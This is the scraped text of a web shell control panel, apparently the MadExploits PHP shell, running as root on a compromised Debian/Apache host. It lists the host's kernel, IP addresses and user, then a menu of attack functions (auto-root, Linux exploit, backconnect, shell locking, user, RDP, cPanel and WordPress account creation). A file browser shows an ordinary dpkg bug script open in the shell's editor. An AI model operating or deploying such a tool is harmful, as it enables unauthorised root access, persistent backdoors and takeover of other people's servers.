Linux e000727e84fa 5.4.0-208-generic #228-Ubuntu SMP Fri Feb 7 19:41:33 UTC 2025 x86_64
Apache/2.4.62 (Debian)
: 192.168.16.2 | : 192.168.16.1
Cant Read [ /etc/named.conf ]
8.2.27
root
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
share /
bug /
[ HOME SHELL ]
Name
Size
Permission
Action
apache2
[ DIR ]
drwxr-xr-x
apache2-bin
[ DIR ]
drwxr-xr-x
apt
[ DIR ]
drwxr-xr-x
binutils
[ DIR ]
drwxr-xr-x
file
[ DIR ]
drwxr-xr-x
init-system-helpers
[ DIR ]
drwxr-xr-x
libmagic1
[ DIR ]
drwxr-xr-x
media-types
[ DIR ]
drwxr-xr-x
procps
[ DIR ]
drwxr-xr-x
dpkg
503
B
-rwxr-xr-x
dpkg-dev
503
B
-rwxr-xr-x
libdpkg-perl
503
B
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : libdpkg-perl
#!/bin/sh for d in /bin /sbin /lib /lib32 /libo32 /libx32 /lib64; do linkname="$(readlink $d)" if [ "$linkname" = "usr$d" ] || [ "$linkname" = "/usr$d" ]; then echo "This system uses merged-usr-via-aliased-dirs, going behind dpkg's" >&3 echo "back, breaking its core assumptions. This can cause silent file" >&3 echo "overwrites and disappearances, and its general tools misbehavior." >&3 echo "See <https://wiki.debian.org/Teams/Dpkg/FAQ#broken-usrmerge>." >&3 break fi done
Close